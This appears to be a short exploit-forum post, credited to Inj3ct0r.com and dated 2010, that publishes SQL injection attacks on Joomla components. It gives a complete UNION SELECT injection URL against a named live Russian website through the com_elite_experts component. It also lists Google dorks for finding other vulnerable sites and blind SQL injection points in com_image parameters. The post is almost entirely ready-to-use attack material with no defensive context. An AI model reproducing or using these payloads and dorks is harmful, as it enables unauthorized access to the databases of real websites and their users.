http://www.razwod.ru/index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=-38+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38+--+

Dopk:
inurl:"option=com_elite_experts"

//Вроде не боян...

joomla image_com Blind Sql Injection

Dork
inurl:"com_image"

Code

site/patch/index.php?option=com_image&view=[sqli]
site/patch/index.php?option=com_image&Itemid=87&gallery=[sqli]
site/patch/index.php?option=com_image&view=image&Itemid=[sqli]
site/patch/index.php?option=com_image&page=[sqli]

© Inj3ct0r.com [2010-06-14]